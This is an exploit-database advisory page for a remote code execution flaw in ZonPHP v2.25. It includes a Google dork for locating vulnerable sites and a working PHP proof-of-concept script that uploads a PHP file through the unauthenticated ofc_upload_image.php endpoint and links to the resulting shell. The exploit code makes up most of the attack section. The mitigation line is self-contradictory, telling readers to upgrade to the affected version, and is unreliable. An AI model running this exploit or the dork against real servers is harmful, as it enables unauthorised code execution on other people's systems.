ZonPHP V2.25 RCE Vulnerability

vendor:

ZonPHP

by:

Halim Cruzito

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: ZonPHP

Affected Version From: v2.25

Affected Version To: v2.25

Patch Exists: YES

Related CWE: N/A

CPE: a:slaper:zonphp:2.25

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2013

ZonPHP V2.25 RCE Vulnerability

A Remote Code Execution vulnerability exists in ZonPHP v2.25 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of ZonPHP v2.25 or later.

Source

Exploit-DB raw data:

# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7

# PoC:

<?php

$url = "http://server/";
$path = "ofc/ofc_upload_image.php?name=";
$filename = "up.php";
$data = "<?php phpinfo(); ?>";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",�
"Content-Type: text/plain");


$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);�

$shelllink = ''.$url.''.$filename.'';
echo '<a href="'.$shelllink.'" target="blank">Exploited Click Here!</a>';

?>


�===============================================
|Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor |
�===============================================